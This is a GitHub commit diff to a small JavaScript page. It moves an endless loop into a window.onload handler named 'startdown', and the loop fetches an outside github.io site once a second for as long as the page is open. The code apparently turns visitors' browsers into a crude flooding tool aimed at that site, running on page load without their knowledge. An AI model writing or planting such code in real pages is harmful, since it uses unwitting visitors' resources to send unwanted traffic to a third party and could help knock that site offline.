This commit is contained in:
Boof 2023-01-17 09:38:22 +01:00 committed by GitHub
parent fc8a3962ee
commit e07a896949
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -16,9 +16,11 @@
setTimeout(resolve, milliseconds); setTimeout(resolve, milliseconds);
}); });
} }
while(true) { window.onload = async function startdown(){
await delay(1000); while(true) {
fetch('https://t0m0t0w.github.io') await delay(1000);
fetch('https://t0m0t0w.github.io')
}
} }
let speed = 1000 let speed = 1000
setInterval(addKrydder, speed); setInterval(addKrydder, speed);